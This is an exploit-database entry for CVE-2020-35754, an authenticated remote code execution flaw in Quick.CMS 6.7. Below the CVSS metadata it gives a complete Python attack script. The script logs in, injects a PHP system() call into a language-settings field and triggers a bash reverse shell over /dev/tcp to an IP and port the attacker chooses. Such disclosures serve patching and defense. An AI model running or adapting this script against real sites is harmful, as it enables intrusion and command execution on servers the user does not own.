Quick.CMS 6.7 Remote Code Execution

2021.01.31
Credit: mari0x00
Risk: High
Local: No
Remote: Yes
CWE: CWE-74


CVSS Base Score: 6.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 8/10
Exploit range: Remote
Attack complexity: Low
Authentication: Single time
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

# Exploit Title: Quick.CMS 6.7 - Remote Code Execution (Authenticated) # Date: 2020-12-28 # Exploit Author: mari0x00 # Vendor Homepage: https://opensolution.org/ # Software Link: https://opensolution.org/download/?sFile=Quick.Cms_v6.7-pl.zip # Description: https://secator.pl/index.php/2021/01/28/cve-2020-35754-authenticated-rce-in-quick-cms-and-quick-cart/ # Version: <= 6.7 # CVE : CVE-2020-35754 #!/usr/bin/python3 import requests import sys from termcolor import colored from time import sleep print(colored('''###########################################################''',"red")) print(colored('''###### Quick.CMS authenticated RCE by mari0x00 #######''',"red")) print(colored('''###########################################################''',"red")) print("") if len(sys.argv) != 6: print((colored("[~] Usage : python3 quickpwn.py <url> <username> <password> <IP> <PORT>","red"))) print((colored("[~] Example: python3 quickpwn.py http://192.168.101.105/quick.cms/ john@example.com pass123 192.168.101.101 4444","red"))) exit() url = sys.argv[1] username = sys.argv[2] password = sys.argv[3] IP = sys.argv[4] PORT = sys.argv[5] #Start session s = requests.Session() headers = {'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0'} #Authenticate print((colored("[+] Attempting user login","blue"))) login_data = { "sEmail": username, "sPass": password, "bAcceptLicense": "1", "iAcceptLicense": "true" } login = s.post(url+"admin.php?p=login", login_data, headers=headers) sleep(0.5) #Exploit print((colored("[+] Adding shell command","blue"))) payload = "Back end\\\"; system('/bin/bash -c \\'bash -i >& /dev/tcp/" + IP + "/" + PORT + " 0>&1\\''); //" shell = { "sOption": "save", "Back_end_only": payload } exploit = s.post(url+"admin.php?p=languages&sLangEdit=en", shell, headers=headers) sleep(1) #Triggering reverse shell (three times just in case) print("") print((colored("[+] Triggering the shell. Go nuts!","green"))) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers) sleep(1) r = s.get(url+"admin.php?p=languages", headers=headers)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2021, cxsecurity.com

 

Back to Top